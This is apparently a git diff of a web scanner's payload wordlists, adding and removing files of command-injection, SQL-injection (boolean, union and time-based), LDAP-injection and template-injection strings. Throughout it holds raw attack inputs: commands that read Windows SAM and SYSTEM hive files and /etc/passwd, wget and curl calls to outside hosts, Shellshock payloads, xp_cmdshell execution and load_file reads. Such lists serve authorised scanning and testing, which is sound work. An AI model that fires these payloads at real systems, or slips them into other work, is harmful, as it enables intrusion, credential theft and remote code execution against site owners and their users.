XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX')
|
||||||
|
systeminfo
|
||||||
|
| systeminfo
|
||||||
|
; systeminfo
|
||||||
|
& systeminfo
|
||||||
|
&& systeminfo
|
||||||
|
system('ls')
|
||||||
|
system('pwd')
|
||||||
|
system('pwd');
|
||||||
|
|| system('sleep 5');
|
||||||
|
| system('sleep 5');
|
||||||
|
; system('sleep 5');
|
||||||
|
& system('sleep 5');
|
||||||
|
&& system('sleep 5');
|
||||||
|
system('sleep 5')
|
||||||
|
system('sleep 5');
|
||||||
|
system('wget https://crowdshield.com/.testing/rce_vuln.txt?req=22fd2w23')
|
||||||
|
system('wget https://xerosecurity.com/.testing/rce_vuln.txt');
|
||||||
|
system('whoami')
|
||||||
|
system('whoami');
|
||||||
|
test*; ls -lhtR /var/www/
|
||||||
|
test* || perl -e 'print "X"x16096'
|
||||||
|
test* | perl -e 'print "X"x16096'
|
||||||
|
test* & perl -e 'print "X"x16096'
|
||||||
|
test* && perl -e 'print "X"x16096'
|
||||||
|
test*; perl -e 'print "X"x16096'
|
||||||
|
$(`type C:\boot.ini`)
|
||||||
|
&&type C:\\boot.ini
|
||||||
|
| type C:\Windows\repair\SAM
|
||||||
|
; type C:\Windows\repair\SAM
|
||||||
|
& type C:\Windows\repair\SAM
|
||||||
|
&& type C:\Windows\repair\SAM
|
||||||
|
type C:\Windows\repair\SAM
|
||||||
|
| type C:\Windows\repair\SYSTEM
|
||||||
|
; type C:\Windows\repair\SYSTEM
|
||||||
|
& type C:\Windows\repair\SYSTEM
|
||||||
|
&& type C:\Windows\repair\SYSTEM
|
||||||
|
type C:\Windows\repair\SYSTEM
|
||||||
|
| type C:\WINNT\repair\SAM
|
||||||
|
; type C:\WINNT\repair\SAM
|
||||||
|
& type C:\WINNT\repair\SAM
|
||||||
|
&& type C:\WINNT\repair\SAM
|
||||||
|
type C:\WINNT\repair\SAM
|
||||||
|
type C:\WINNT\repair\SYSTEM
|
||||||
|
| type %SYSTEMROOT%\repair\SAM
|
||||||
|
; type %SYSTEMROOT%\repair\SAM
|
||||||
|
& type %SYSTEMROOT%\repair\SAM
|
||||||
|
&& type %SYSTEMROOT%\repair\SAM
|
||||||
|
type %SYSTEMROOT%\repair\SAM
|
||||||
|
| type %SYSTEMROOT%\repair\SYSTEM
|
||||||
|
; type %SYSTEMROOT%\repair\SYSTEM
|
||||||
|
& type %SYSTEMROOT%\repair\SYSTEM
|
||||||
|
&& type %SYSTEMROOT%\repair\SYSTEM
|
||||||
|
type %SYSTEMROOT%\repair\SYSTEM
|
||||||
|
uname
|
||||||
|
;uname;
|
||||||
|
| uname -a
|
||||||
|
; uname -a
|
||||||
|
& uname -a
|
||||||
|
&& uname -a
|
||||||
|
uname -a
|
||||||
|
|/usr/bin/id
|
||||||
|
;|/usr/bin/id|
|
||||||
|
;/usr/bin/id|
|
||||||
|
$;/usr/bin/id
|
||||||
|
() { :;};/usr/bin/perl -e 'print \"Content-Type: text/plain\\r\\n\\r\\nXSUCCESS!\";system(\"wget http://135.23.158.130/.testing/shellshock.txt?vuln=13;curl http://135.23.158.130/.testing/shellshock.txt?vuln=15;\");'
|
||||||
|
() { :;}; wget http://135.23.158.130/.testing/shellshock.txt?vuln=11
|
||||||
|
| wget http://crowdshield.com/.testing/rce.txt
|
||||||
|
& wget http://crowdshield.com/.testing/rce.txt
|
||||||
|
; wget https://crowdshield.com/.testing/rce_vuln.txt
|
||||||
|
$(`wget https://crowdshield.com/.testing/rce_vuln.txt`)
|
||||||
|
&& wget https://crowdshield.com/.testing/rce_vuln.txt
|
||||||
|
wget https://crowdshield.com/.testing/rce_vuln.txt
|
||||||
|
$(`wget https://crowdshield.com/.testing/rce_vuln.txt?req=22jjffjbn`)
|
||||||
|
which curl
|
||||||
|
which gcc
|
||||||
|
which nc
|
||||||
|
which netcat
|
||||||
|
which perl
|
||||||
|
which python
|
||||||
|
which wget
|
||||||
|
whoami
|
||||||
|
| whoami
|
||||||
|
; whoami
|
||||||
|
' whoami
|
||||||
|
' || whoami
|
||||||
|
' & whoami
|
||||||
|
' && whoami
|
||||||
|
'; whoami
|
||||||
|
" whoami
|
||||||
|
" || whoami
|
||||||
|
" | whoami
|
||||||
|
" & whoami
|
||||||
|
" && whoami
|
||||||
|
"; whoami
|
||||||
|
$(`whoami`)
|
||||||
|
& whoami
|
||||||
|
&& whoami
|
||||||
|
{{ get_user_file("C:\boot.ini") }}
|
||||||
|
{{ get_user_file("/etc/hosts") }}
|
||||||
|
{{ get_user_file("/etc/passwd") }}
|
||||||
|
{{4+4}}
|
||||||
|
{{4+8}}
|
||||||
|
{{person.secret}}
|
||||||
|
{{person.name}}
|
||||||
|
{1} + {1}
|
||||||
|
{% For c in [1,2,3]%} {{c, c, c}} {% endfor%}
|
||||||
|
{{[] .__ Class __.__ base __.__ subclasses __ ()}}
|
|
@ -0,0 +1,120 @@
|
||||||
|
==
|
||||||
|
=
|
||||||
|
'
|
||||||
|
' --
|
||||||
|
' #
|
||||||
|
' –
|
||||||
|
'--
|
||||||
|
'/*
|
||||||
|
'#
|
||||||
|
" --
|
||||||
|
" #
|
||||||
|
"/*
|
||||||
|
' and 1='1
|
||||||
|
' and a='a
|
||||||
|
or 1=1
|
||||||
|
or true
|
||||||
|
' or ''='
|
||||||
|
" or ""="
|
||||||
|
1′) and '1′='1–
|
||||||
|
' AND 1=0 UNION ALL SELECT '', '81dc9bdb52d04dc20036dbd8313ed055
|
||||||
|
" AND 1=0 UNION ALL SELECT "", "81dc9bdb52d04dc20036dbd8313ed055
|
||||||
|
and 1=1
|
||||||
|
and 1=1–
|
||||||
|
' and 'one'='one
|
||||||
|
' and 'one'='one–
|
||||||
|
' group by password having 1=1--
|
||||||
|
' group by userid having 1=1--
|
||||||
|
' group by username having 1=1--
|
||||||
|
like '%'
|
||||||
|
or 0=0 --
|
||||||
|
or 0=0 #
|
||||||
|
or 0=0 –
|
||||||
|
' or 0=0 #
|
||||||
|
' or 0=0 --
|
||||||
|
' or 0=0 #
|
||||||
|
' or 0=0 –
|
||||||
|
" or 0=0 --
|
||||||
|
" or 0=0 #
|
||||||
|
" or 0=0 –
|
||||||
|
%' or '0'='0
|
||||||
|
or 1=1
|
||||||
|
or 1=1--
|
||||||
|
or 1=1/*
|
||||||
|
or 1=1#
|
||||||
|
or 1=1–
|
||||||
|
' or 1=1--
|
||||||
|
' or '1'='1
|
||||||
|
' or '1'='1'--
|
||||||
|
' or '1'='1'/*
|
||||||
|
' or '1'='1'#
|
||||||
|
' or '1′='1
|
||||||
|
' or 1=1
|
||||||
|
' or 1=1 --
|
||||||
|
' or 1=1 –
|
||||||
|
' or 1=1--
|
||||||
|
' or 1=1;#
|
||||||
|
' or 1=1/*
|
||||||
|
' or 1=1#
|
||||||
|
' or 1=1–
|
||||||
|
') or '1'='1
|
||||||
|
') or '1'='1--
|
||||||
|
') or '1'='1'--
|
||||||
|
') or '1'='1'/*
|
||||||
|
') or '1'='1'#
|
||||||
|
') or ('1'='1
|
||||||
|
') or ('1'='1--
|
||||||
|
') or ('1'='1'--
|
||||||
|
') or ('1'='1'/*
|
||||||
|
') or ('1'='1'#
|
||||||
|
'or'1=1
|
||||||
|
'or'1=1′
|
||||||
|
" or "1"="1
|
||||||
|
" or "1"="1"--
|
||||||
|
" or "1"="1"/*
|
||||||
|
" or "1"="1"#
|
||||||
|
" or 1=1
|
||||||
|
" or 1=1 --
|
||||||
|
" or 1=1 –
|
||||||
|
" or 1=1--
|
||||||
|
" or 1=1/*
|
||||||
|
" or 1=1#
|
||||||
|
" or 1=1–
|
||||||
|
") or "1"="1
|
||||||
|
") or "1"="1"--
|
||||||
|
") or "1"="1"/*
|
||||||
|
") or "1"="1"#
|
||||||
|
") or ("1"="1
|
||||||
|
") or ("1"="1"--
|
||||||
|
") or ("1"="1"/*
|
||||||
|
") or ("1"="1"#
|
||||||
|
) or '1′='1–
|
||||||
|
) or ('1′='1–
|
||||||
|
' or 1=1 LIMIT 1;#
|
||||||
|
'or 1=1 or ''='
|
||||||
|
"or 1=1 or ""="
|
||||||
|
' or 'a'='a
|
||||||
|
' or a=a--
|
||||||
|
' or a=a–
|
||||||
|
') or ('a'='a
|
||||||
|
" or "a"="a
|
||||||
|
") or ("a"="a
|
||||||
|
') or ('a'='a and hi") or ("a"="a
|
||||||
|
' or 'one'='one
|
||||||
|
' or 'one'='one–
|
||||||
|
' or uid like '%
|
||||||
|
' or uname like '%
|
||||||
|
' or userid like '%
|
||||||
|
' or user like '%
|
||||||
|
' or username like '%
|
||||||
|
' or 'x'='x
|
||||||
|
') or ('x'='x
|
||||||
|
" or "x"="x
|
||||||
|
' OR 'x'='x'#;
|
||||||
|
'=' 'or' and '=' 'or'
|
||||||
|
' UNION ALL SELECT 1, @@version;#
|
||||||
|
' UNION ALL SELECT system_user(),user();#
|
||||||
|
' UNION select table_schema,table_name FROM information_Schema.tables;#
|
||||||
|
admin' and substring(password/text(),1,1)='7
|
||||||
|
' and substring(password/text(),1,1)='7
|
||||||
|
|
|
@ -1,42 +0,0 @@
|
||||||
# from wapiti
|
|
||||||
sleep(__TIME__)#
|
|
||||||
1 or sleep(__TIME__)#
|
|
||||||
" or sleep(__TIME__)#
|
|
||||||
' or sleep(__TIME__)#
|
|
||||||
" or sleep(__TIME__)="
|
|
||||||
' or sleep(__TIME__)='
|
|
||||||
1) or sleep(__TIME__)#
|
|
||||||
") or sleep(__TIME__)="
|
|
||||||
') or sleep(__TIME__)='
|
|
||||||
1)) or sleep(__TIME__)#
|
|
||||||
")) or sleep(__TIME__)="
|
|
||||||
')) or sleep(__TIME__)='
|
|
||||||
;waitfor delay '0:0:__TIME__'--
|
|
||||||
);waitfor delay '0:0:__TIME__'--
|
|
||||||
';waitfor delay '0:0:__TIME__'--
|
|
||||||
";waitfor delay '0:0:__TIME__'--
|
|
||||||
');waitfor delay '0:0:__TIME__'--
|
|
||||||
");waitfor delay '0:0:__TIME__'--
|
|
||||||
));waitfor delay '0:0:__TIME__'--
|
|
||||||
'));waitfor delay '0:0:__TIME__'--
|
|
||||||
"));waitfor delay '0:0:__TIME__'--
|
|
||||||
benchmark(10000000,MD5(1))#
|
|
||||||
1 or benchmark(10000000,MD5(1))#
|
|
||||||
" or benchmark(10000000,MD5(1))#
|
|
||||||
' or benchmark(10000000,MD5(1))#
|
|
||||||
1) or benchmark(10000000,MD5(1))#
|
|
||||||
") or benchmark(10000000,MD5(1))#
|
|
||||||
') or benchmark(10000000,MD5(1))#
|
|
||||||
1)) or benchmark(10000000,MD5(1))#
|
|
||||||
")) or benchmark(10000000,MD5(1))#
|
|
||||||
')) or benchmark(10000000,MD5(1))#
|
|
||||||
pg_sleep(__TIME__)--
|
|
||||||
1 or pg_sleep(__TIME__)--
|
|
||||||
" or pg_sleep(__TIME__)--
|
|
||||||
' or pg_sleep(__TIME__)--
|
|
||||||
1) or pg_sleep(__TIME__)--
|
|
||||||
") or pg_sleep(__TIME__)--
|
|
||||||
') or pg_sleep(__TIME__)--
|
|
||||||
1)) or pg_sleep(__TIME__)--
|
|
||||||
")) or pg_sleep(__TIME__)--
|
|
||||||
')) or pg_sleep(__TIME__)--
|
|
|
@ -0,0 +1,154 @@
|
||||||
|
OR 1=1
|
||||||
|
OR 1=0
|
||||||
|
OR x=x
|
||||||
|
OR x=y
|
||||||
|
OR 1=1#
|
||||||
|
OR 1=0#
|
||||||
|
OR x=x#
|
||||||
|
OR x=y#
|
||||||
|
OR 1=1--
|
||||||
|
OR 1=0--
|
||||||
|
OR x=x--
|
||||||
|
OR x=y--
|
||||||
|
OR 3409=3409 AND ('pytW' LIKE 'pytW
|
||||||
|
OR 3409=3409 AND ('pytW' LIKE 'pytY
|
||||||
|
HAVING 1=1
|
||||||
|
HAVING 1=0
|
||||||
|
HAVING 1=1#
|
||||||
|
HAVING 1=0#
|
||||||
|
HAVING 1=1--
|
||||||
|
HAVING 1=0--
|
||||||
|
AND 1=1
|
||||||
|
AND 1=0
|
||||||
|
AND 1=1--
|
||||||
|
AND 1=0--
|
||||||
|
AND 1=1#
|
||||||
|
AND 1=0#
|
||||||
|
AND 1=1 AND '%'='
|
||||||
|
AND 1=0 AND '%'='
|
||||||
|
AND 1083=1083 AND (1427=1427
|
||||||
|
AND 7506=9091 AND (5913=5913
|
||||||
|
AND 1083=1083 AND ('1427=1427
|
||||||
|
AND 7506=9091 AND ('5913=5913
|
||||||
|
AND 7300=7300 AND 'pKlZ'='pKlZ
|
||||||
|
AND 7300=7300 AND 'pKlZ'='pKlY
|
||||||
|
AND 7300=7300 AND ('pKlZ'='pKlZ
|
||||||
|
AND 7300=7300 AND ('pKlZ'='pKlY
|
||||||
|
AS INJECTX WHERE 1=1 AND 1=1
|
||||||
|
AS INJECTX WHERE 1=1 AND 1=0
|
||||||
|
AS INJECTX WHERE 1=1 AND 1=1#
|
||||||
|
AS INJECTX WHERE 1=1 AND 1=0#
|
||||||
|
AS INJECTX WHERE 1=1 AND 1=1--
|
||||||
|
AS INJECTX WHERE 1=1 AND 1=0--
|
||||||
|
WHERE 1=1 AND 1=1
|
||||||
|
WHERE 1=1 AND 1=0
|
||||||
|
WHERE 1=1 AND 1=1#
|
||||||
|
WHERE 1=1 AND 1=0#
|
||||||
|
WHERE 1=1 AND 1=1--
|
||||||
|
WHERE 1=1 AND 1=0--
|
||||||
|
ORDER BY 1--
|
||||||
|
ORDER BY 2--
|
||||||
|
ORDER BY 3--
|
||||||
|
ORDER BY 4--
|
||||||
|
ORDER BY 5--
|
||||||
|
ORDER BY 6--
|
||||||
|
ORDER BY 7--
|
||||||
|
ORDER BY 8--
|
||||||
|
ORDER BY 9--
|
||||||
|
ORDER BY 10--
|
||||||
|
ORDER BY 11--
|
||||||
|
ORDER BY 12--
|
||||||
|
ORDER BY 13--
|
||||||
|
ORDER BY 14--
|
||||||
|
ORDER BY 15--
|
||||||
|
ORDER BY 16--
|
||||||
|
ORDER BY 17--
|
||||||
|
ORDER BY 18--
|
||||||
|
ORDER BY 19--
|
||||||
|
ORDER BY 20--
|
||||||
|
ORDER BY 21--
|
||||||
|
ORDER BY 22--
|
||||||
|
ORDER BY 23--
|
||||||
|
ORDER BY 24--
|
||||||
|
ORDER BY 25--
|
||||||
|
ORDER BY 26--
|
||||||
|
ORDER BY 27--
|
||||||
|
ORDER BY 28--
|
||||||
|
ORDER BY 29--
|
||||||
|
ORDER BY 30--
|
||||||
|
ORDER BY 31337--
|
||||||
|
ORDER BY 1#
|
||||||
|
ORDER BY 2#
|
||||||
|
ORDER BY 3#
|
||||||
|
ORDER BY 4#
|
||||||
|
ORDER BY 5#
|
||||||
|
ORDER BY 6#
|
||||||
|
ORDER BY 7#
|
||||||
|
ORDER BY 8#
|
||||||
|
ORDER BY 9#
|
||||||
|
ORDER BY 10#
|
||||||
|
ORDER BY 11#
|
||||||
|
ORDER BY 12#
|
||||||
|
ORDER BY 13#
|
||||||
|
ORDER BY 14#
|
||||||
|
ORDER BY 15#
|
||||||
|
ORDER BY 16#
|
||||||
|
ORDER BY 17#
|
||||||
|
ORDER BY 18#
|
||||||
|
ORDER BY 19#
|
||||||
|
ORDER BY 20#
|
||||||
|
ORDER BY 21#
|
||||||
|
ORDER BY 22#
|
||||||
|
ORDER BY 23#
|
||||||
|
ORDER BY 24#
|
||||||
|
ORDER BY 25#
|
||||||
|
ORDER BY 26#
|
||||||
|
ORDER BY 27#
|
||||||
|
ORDER BY 28#
|
||||||
|
ORDER BY 29#
|
||||||
|
ORDER BY 30#
|
||||||
|
ORDER BY 31337#
|
||||||
|
ORDER BY 1
|
||||||
|
ORDER BY 2
|
||||||
|
ORDER BY 3
|
||||||
|
ORDER BY 4
|
||||||
|
ORDER BY 5
|
||||||
|
ORDER BY 6
|
||||||
|
ORDER BY 7
|
||||||
|
ORDER BY 8
|
||||||
|
ORDER BY 9
|
||||||
|
ORDER BY 10
|
||||||
|
ORDER BY 11
|
||||||
|
ORDER BY 12
|
||||||
|
ORDER BY 13
|
||||||
|
ORDER BY 14
|
||||||
|
ORDER BY 15
|
||||||
|
ORDER BY 16
|
||||||
|
ORDER BY 17
|
||||||
|
ORDER BY 18
|
||||||
|
ORDER BY 19
|
||||||
|
ORDER BY 20
|
||||||
|
ORDER BY 21
|
||||||
|
ORDER BY 22
|
||||||
|
ORDER BY 23
|
||||||
|
ORDER BY 24
|
||||||
|
ORDER BY 25
|
||||||
|
ORDER BY 26
|
||||||
|
ORDER BY 27
|
||||||
|
ORDER BY 28
|
||||||
|
ORDER BY 29
|
||||||
|
ORDER BY 30
|
||||||
|
ORDER BY 31337
|
||||||
|
RLIKE (SELECT (CASE WHEN (4346=4346) THEN 0x61646d696e ELSE 0x28 END)) AND 'Txws'='
|
||||||
|
RLIKE (SELECT (CASE WHEN (4346=4347) THEN 0x61646d696e ELSE 0x28 END)) AND 'Txws'='
|
||||||
|
IF(7423=7424) SELECT 7423 ELSE DROP FUNCTION xcjl--
|
||||||
|
IF(7423=7423) SELECT 7423 ELSE DROP FUNCTION xcjl--
|
||||||
|
%' AND 8310=8310 AND '%'='
|
||||||
|
%' AND 8310=8311 AND '%'='
|
||||||
|
and (select substring(@@version,1,1))='X'
|
||||||
|
and (select substring(@@version,1,1))='M'
|
||||||
|
and (select substring(@@version,2,1))='i'
|
||||||
|
and (select substring(@@version,2,1))='y'
|
||||||
|
and (select substring(@@version,3,1))='c'
|
||||||
|
and (select substring(@@version,3,1))='S'
|
||||||
|
and (select substring(@@version,3,1))='X'
|
|
@ -1,267 +0,0 @@
|
||||||
)%20or%20('x'='x
|
|
||||||
%20or%201=1
|
|
||||||
; execute immediate 'sel' || 'ect us' || 'er'
|
|
||||||
benchmark(10000000,MD5(1))#
|
|
||||||
update
|
|
||||||
";waitfor delay '0:0:__TIME__'--
|
|
||||||
1) or pg_sleep(__TIME__)--
|
|
||||||
||(elt(-3+5,bin(15),ord(10),hex(char(45))))
|
|
||||||
"hi"") or (""a""=""a"
|
|
||||||
delete
|
|
||||||
like
|
|
||||||
" or sleep(__TIME__)#
|
|
||||||
pg_sleep(__TIME__)--
|
|
||||||
*(|(objectclass=*))
|
|
||||||
declare @q nvarchar (200) 0x730065006c00650063 ...
|
|
||||||
or 0=0 #
|
|
||||||
insert
|
|
||||||
1) or sleep(__TIME__)#
|
|
||||||
) or ('a'='a
|
|
||||||
; exec xp_regread
|
|
||||||
*|
|
|
||||||
@var select @var as var into temp end --
|
|
||||||
1)) or benchmark(10000000,MD5(1))#
|
|
||||||
asc
|
|
||||||
(||6)
|
|
||||||
"a"" or 3=3--"
|
|
||||||
" or benchmark(10000000,MD5(1))#
|
|
||||||
# from wapiti
|
|
||||||
or 0=0 --
|
|
||||||
1 waitfor delay '0:0:10'--
|
|
||||||
or 'a'='a
|
|
||||||
hi or 1=1 --"
|
|
||||||
or a = a
|
|
||||||
UNION ALL SELECT
|
|
||||||
) or sleep(__TIME__)='
|
|
||||||
)) or benchmark(10000000,MD5(1))#
|
|
||||||
hi' or 'a'='a
|
|
||||||
0
|
|
||||||
21 %
|
|
||||||
limit
|
|
||||||
or 1=1
|
|
||||||
or 2 > 1
|
|
||||||
")) or benchmark(10000000,MD5(1))#
|
|
||||||
PRINT
|
|
||||||
hi') or ('a'='a
|
|
||||||
or 3=3
|
|
||||||
));waitfor delay '0:0:__TIME__'--
|
|
||||||
a' waitfor delay '0:0:10'--
|
|
||||||
1;(load_file(char(47,101,116,99,47,112,97,115, ...
|
|
||||||
or%201=1
|
|
||||||
1 or sleep(__TIME__)#
|
|
||||||
or 1=1
|
|
||||||
and 1 in (select var from temp)--
|
|
||||||
or '7659'='7659
|
|
||||||
or 'text' = n'text'
|
|
||||||
--
|
|
||||||
or 1=1 or ''='
|
|
||||||
declare @s varchar (200) select @s = 0x73656c6 ...
|
|
||||||
exec xp
|
|
||||||
; exec master..xp_cmdshell 'ping 172.10.1.255'--
|
|
||||||
3.10E+17
|
|
||||||
" or pg_sleep(__TIME__)--
|
|
||||||
x' AND email IS NULL; --
|
|
||||||
&
|
|
||||||
admin' or '
|
|
||||||
or 'unusual' = 'unusual'
|
|
||||||
//
|
|
||||||
truncate
|
|
||||||
1) or benchmark(10000000,MD5(1))#
|
|
||||||
\x27UNION SELECT
|
|
||||||
declare @s varchar(200) select @s = 0x77616974 ...
|
|
||||||
tz_offset
|
|
||||||
sqlvuln
|
|
||||||
"));waitfor delay '0:0:__TIME__'--
|
|
||||||
||6
|
|
||||||
or%201=1 --
|
|
||||||
%2A%28%7C%28objectclass%3D%2A%29%29
|
|
||||||
or a=a
|
|
||||||
) union select * from information_schema.tables;
|
|
||||||
PRINT @@variable
|
|
||||||
or isNULL(1/0) /*
|
|
||||||
26 %
|
|
||||||
" or "a"="a
|
|
||||||
(sqlvuln)
|
|
||||||
x' AND members.email IS NULL; --
|
|
||||||
or 1=1--
|
|
||||||
and 1=( if((load_file(char(110,46,101,120,11 ...
|
|
||||||
0x770061006900740066006F0072002000640065006C00 ...
|
|
||||||
%20'sleep%2050'
|
|
||||||
as
|
|
||||||
1)) or pg_sleep(__TIME__)--
|
|
||||||
/**/or/**/1/**/=/**/1
|
|
||||||
union all select @@version--
|
|
||||||
,@variable
|
|
||||||
(sqlattempt2)
|
|
||||||
or (EXISTS)
|
|
||||||
t'exec master..xp_cmdshell 'nslookup www.googl ...
|
|
||||||
%20$(sleep%2050)
|
|
||||||
1 or benchmark(10000000,MD5(1))#
|
|
||||||
%20or%20''='
|
|
||||||
||UTL_HTTP.REQUEST
|
|
||||||
or pg_sleep(__TIME__)--
|
|
||||||
hi' or 'x'='x';
|
|
||||||
") or sleep(__TIME__)="
|
|
||||||
or 'whatever' in ('whatever')
|
|
||||||
; begin declare @var varchar(8000) set @var=' ...
|
|
||||||
union select 1,load_file('/etc/passwd'),1,1,1;
|
|
||||||
0x77616974666F722064656C61792027303A303A313027 ...
|
|
||||||
exec(@s)
|
|
||||||
) or pg_sleep(__TIME__)--
|
|
||||||
union select
|
|
||||||
or sleep(__TIME__)#
|
|
||||||
select * from information_schema.tables--
|
|
||||||
a' or 1=1--
|
|
||||||
a' or 'a' = 'a
|
|
||||||
declare @s varchar(22) select @s =
|
|
||||||
or 2 between 1 and 3
|
|
||||||
or a=a--
|
|
||||||
or '1'='1
|
|
||||||
|
|
|
||||||
or sleep(__TIME__)='
|
|
||||||
or 1 --'
|
|
||||||
or 0=0 #"
|
|
||||||
having
|
|
||||||
a'
|
|
||||||
" or isNULL(1/0) /*
|
|
||||||
declare @s varchar (8000) select @s = 0x73656c ...
|
|
||||||
â or 1=1 --
|
|
||||||
char%4039%41%2b%40SELECT
|
|
||||||
order by
|
|
||||||
bfilename
|
|
||||||
having 1=1--
|
|
||||||
) or benchmark(10000000,MD5(1))#
|
|
||||||
or username like char(37);
|
|
||||||
;waitfor delay '0:0:__TIME__'--
|
|
||||||
" or 1=1--
|
|
||||||
x' AND userid IS NULL; --
|
|
||||||
*/*
|
|
||||||
or 'text' > 't'
|
|
||||||
(select top 1
|
|
||||||
or benchmark(10000000,MD5(1))#
|
|
||||||
");waitfor delay '0:0:__TIME__'--
|
|
||||||
a' or 3=3--
|
|
||||||
-- &password=
|
|
||||||
group by userid having 1=1--
|
|
||||||
or ''='
|
|
||||||
; exec master..xp_cmdshell
|
|
||||||
%20or%20x=x
|
|
||||||
select
|
|
||||||
")) or sleep(__TIME__)="
|
|
||||||
0x730065006c0065006300740020004000400076006500 ...
|
|
||||||
hi' or 1=1 --
|
|
||||||
") or pg_sleep(__TIME__)--
|
|
||||||
%20or%20'x'='x
|
|
||||||
or 'something' = 'some'+'thing'
|
|
||||||
exec sp
|
|
||||||
29 %
|
|
||||||
(
|
|
||||||
ý or 1=1 --
|
|
||||||
1 or pg_sleep(__TIME__)--
|
|
||||||
0 or 1=1
|
|
||||||
) or (a=a
|
|
||||||
uni/**/on sel/**/ect
|
|
||||||
replace
|
|
||||||
%27%20or%201=1
|
|
||||||
)) or pg_sleep(__TIME__)--
|
|
||||||
%7C
|
|
||||||
x' AND 1=(SELECT COUNT(*) FROM tabname); --
|
|
||||||
'%20OR
|
|
||||||
; or '1'='1'
|
|
||||||
declare @q nvarchar (200) select @q = 0x770061 ...
|
|
||||||
1 or 1=1
|
|
||||||
; exec ('sel' + 'ect us' + 'er')
|
|
||||||
23 OR 1=1
|
|
||||||
/
|
|
||||||
anything' OR 'x'='x
|
|
||||||
declare @q nvarchar (4000) select @q =
|
|
||||||
or 0=0 --
|
|
||||||
desc
|
|
||||||
||'6
|
|
||||||
)
|
|
||||||
1)) or sleep(__TIME__)#
|
|
||||||
or 0=0 #
|
|
||||||
select name from syscolumns where id = (sele ...
|
|
||||||
hi or a=a
|
|
||||||
*(|(mail=*))
|
|
||||||
password:*/=1--
|
|
||||||
distinct
|
|
||||||
);waitfor delay '0:0:__TIME__'--
|
|
||||||
to_timestamp_tz
|
|
||||||
") or benchmark(10000000,MD5(1))#
|
|
||||||
UNION SELECT
|
|
||||||
%2A%28%7C%28mail%3D%2A%29%29
|
|
||||||
+sqlvuln
|
|
||||||
or 1=1 /*
|
|
||||||
)) or sleep(__TIME__)='
|
|
||||||
or 1=1 or ""=
|
|
||||||
or 1 in (select @@version)--
|
|
||||||
sqlvuln;
|
|
||||||
union select * from users where login = char ...
|
|
||||||
x' or 1=1 or 'x'='y
|
|
||||||
28 %
|
|
||||||
â or 3=3 --
|
|
||||||
@variable
|
|
||||||
or '1'='1'--
|
|
||||||
"a"" or 1=1--"
|
|
||||||
//*
|
|
||||||
%2A%7C
|
|
||||||
" or 0=0 --
|
|
||||||
")) or pg_sleep(__TIME__)--
|
|
||||||
?
|
|
||||||
or 1/*
|
|
||||||
!
|
|
||||||
'
|
|
||||||
or a = a
|
|
||||||
declare @q nvarchar (200) select @q = 0x770061006900740066006F0072002000640065006C00610079002000270030003A0030003A0031003000270000 exec(@q)
|
|
||||||
declare @s varchar(200) select @s = 0x77616974666F722064656C61792027303A303A31302700 exec(@s)
|
|
||||||
declare @q nvarchar (200) 0x730065006c00650063007400200040004000760065007200730069006f006e00 exec(@q)
|
|
||||||
declare @s varchar (200) select @s = 0x73656c65637420404076657273696f6e exec(@s)
|
|
||||||
' or 1=1
|
|
||||||
or 1=1 --
|
|
||||||
x' OR full_name LIKE '%Bob%
|
|
||||||
'; exec master..xp_cmdshell 'ping 172.10.1.255'--
|
|
||||||
'%20or%20''='
|
|
||||||
'%20or%20'x'='x
|
|
||||||
')%20or%20('x'='x
|
|
||||||
' or 0=0 --
|
|
||||||
' or 0=0 #
|
|
||||||
or 0=0 #"
|
|
||||||
' or 1=1--
|
|
||||||
' or '1'='1'--
|
|
||||||
' or 1 --'
|
|
||||||
or 1=1--
|
|
||||||
' or 1=1 or ''='
|
|
||||||
or 1=1 or ""=
|
|
||||||
' or a=a--
|
|
||||||
or a=a
|
|
||||||
') or ('a'='a
|
|
||||||
'hi' or 'x'='x';
|
|
||||||
or
|
|
||||||
procedure
|
|
||||||
handler
|
|
||||||
' or username like '%
|
|
||||||
' or uname like '%
|
|
||||||
' or userid like '%
|
|
||||||
' or uid like '%
|
|
||||||
' or user like '%
|
|
||||||
'; exec master..xp_cmdshell
|
|
||||||
'; exec xp_regread
|
|
||||||
t'exec master..xp_cmdshell 'nslookup www.google.com'--
|
|
||||||
--sp_password
|
|
||||||
' UNION SELECT
|
|
||||||
' UNION ALL SELECT
|
|
||||||
' or (EXISTS)
|
|
||||||
' (select top 1
|
|
||||||
'||UTL_HTTP.REQUEST
|
|
||||||
1;SELECT%20*
|
|
||||||
<>"'%;)(&+
|
|
||||||
'%20or%201=1
|
|
||||||
'sqlattempt1
|
|
||||||
%28
|
|
||||||
%29
|
|
||||||
%26
|
|
||||||
%21
|
|
||||||
' or ''='
|
|
||||||
' or 3=3
|
|
||||||
or 3=3 --
|
|
|
@ -0,0 +1,95 @@
|
||||||
|
# from wapiti
|
||||||
|
sleep(5)#
|
||||||
|
1 or sleep(5)#
|
||||||
|
" or sleep(5)#
|
||||||
|
' or sleep(5)#
|
||||||
|
" or sleep(5)="
|
||||||
|
' or sleep(5)='
|
||||||
|
1) or sleep(5)#
|
||||||
|
") or sleep(5)="
|
||||||
|
') or sleep(5)='
|
||||||
|
1)) or sleep(5)#
|
||||||
|
")) or sleep(5)="
|
||||||
|
')) or sleep(5)='
|
||||||
|
;waitfor delay '0:0:5'--
|
||||||
|
);waitfor delay '0:0:5'--
|
||||||
|
';waitfor delay '0:0:5'--
|
||||||
|
";waitfor delay '0:0:5'--
|
||||||
|
');waitfor delay '0:0:5'--
|
||||||
|
");waitfor delay '0:0:5'--
|
||||||
|
));waitfor delay '0:0:5'--
|
||||||
|
